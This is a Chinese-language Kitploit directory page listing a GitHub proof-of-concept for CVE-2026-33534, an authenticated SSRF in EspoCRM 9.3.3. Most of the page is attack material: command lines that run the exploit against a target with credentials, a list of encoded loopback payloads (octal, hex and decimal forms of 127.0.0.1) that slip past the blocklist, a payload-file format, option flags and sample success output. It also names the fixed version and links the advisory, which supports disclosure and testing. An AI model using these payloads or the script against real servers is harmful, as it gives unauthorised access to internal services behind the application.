Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33534 — EspoCRM 9.3.3 - 通过替代 IPv4 表示法实现已认证 SSRF | Kitploit
工具/GitHubGitHub/entrovyx/cve-2026-33534
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubentrovyx/cve-2026-33534

CVE-2026-33534

EspoCRM 9.3.3 - 通过替代 IPv4 表示法实现已认证 SSRF

查看仓库
24个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33534 - EspoCRM 9.3.3 认证后 SSRF

针对 EspoCRM 9.3.3 中 /api/v1/Attachment/fromImageUrl 端点通过替代 IPv4 环回表示法实现认证后 SSRF 的概念验证。

摘要

EspoCRM 9.3.3 会阻止诸如 http://127.0.0.1/... 之类的直接环回 URL,但服务端获取路径接受 cURL 会将其规范化为环回的替代 IPv4 表示形式。这使得有权访问受影响附件/图片上传流程的认证用户能够使 EspoCRM 服务器获取内部资源。

该漏洞利用首先提交一个直接的 127.0.0.1 控制请求,并预期其被 HTTP 403 阻止。随后测试多种编码的环回载荷,并报告哪些载荷生成了存储的附件。

受影响版本

  • 存在漏洞:EspoCRM 9.3.3
  • 已修复:EspoCRM 9.3.4
  • 安全公告:https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
  • CVE:CVE-2026-33534
  • CWE:CWE-918

环境要求

  • Python 3
  • requests
  • 有效的 EspoCRM 凭据
  • 使用目标图片/附件字段的权限

安装依赖:

root@kitploit:~
python3 -m pip install requests

使用方法

针对运行在端口 8083 上的 EspoCRM 实例进行基本本地验证:

root@kitploit:~
python3 CVE-2026-33534.py \
  -u http://127.0.0.1:8083 \
  -U admin \
  -P 'Admin12345!' \
  --internal-port 8083 \
  --cleanup

测试自定义端口和路径上的内部服务:

root@kitploit:~
python3 CVE-2026-33534.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --internal-port 9002 \
  --internal-path /interno.png \
  --cleanup

仅使用自定义载荷:

root@kitploit:~
python3 CVE-2026-33534.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --no-default-payloads \
  --payload 0x7f000001 \
  --payload 2130706433

默认载荷

该漏洞利用默认测试以下环回主机表示形式:

root@kitploit:~
0177.0.0.1
0177.0000.0000.0001
0177.1
0x7f.0.0.1
0x7f.0x0.0x0.0x1
0x7f000001
2130706433
017700000001
127.1
127.0.1
127.000.000.001
0000000000000000000000000177.0.0.1

支持自定义载荷文件。每行可以是以下任一格式:

root@kitploit:~
host
label=host

示例:

root@kitploit:~
hex-dword=0x7f000001
decimal-dword=2130706433

运行方式:

root@kitploit:~
python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload-file payloads.txt

选项

root@kitploit:~
-u, --url                 基础 EspoCRM URL
-U, --username             EspoCRM 用户名
-P, --password             EspoCRM 密码
--internal-port            要获取的内部环回端口
--internal-path            要获取的内部路径
--payload                  额外的环回主机表示法
--payload-file             每行包含一个主机载荷的文件
--no-default-payloads      仅使用自定义载荷
--field                    附件字段,默认:avatar
--parent-type              父实体类型,默认:User
--parent-id                可选的父实体 ID
--cleanup                  删除成功载荷创建的附件
--stop-on-first            在第一个成功绕过时停止
--insecure                 禁用 TLS 证书验证

预期输出

成功利用会显示直接环回控制被阻止,且一个或多个编码载荷被接受:

root@kitploit:~
[*] Control response: HTTP 403 Not allowed URL.
[+] octal dotted             0177.0.0.1        HTTP 200 id=... type=image/svg+xml size=4438
[+] hex dword                0x7f000001        HTTP 200 id=... type=image/svg+xml size=4438

[+] Vulnerable behavior confirmed.
[+] Direct loopback control: HTTP 403
[+] Successful payloads: 12

注意事项

  • 默认 PoC 从目标自身的环回监听器获取 /client/img/logo-light.svg。如需针对其他内部服务,请调整 --internal-port 和 --internal-path。
  • 默认字段为 User.avatar;如果测试账户需要不同的上传上下文,请使用 --field、--parent-type 和 --parent-id。
  • 测试期间使用 --cleanup 可自动删除创建的附件。
下载工具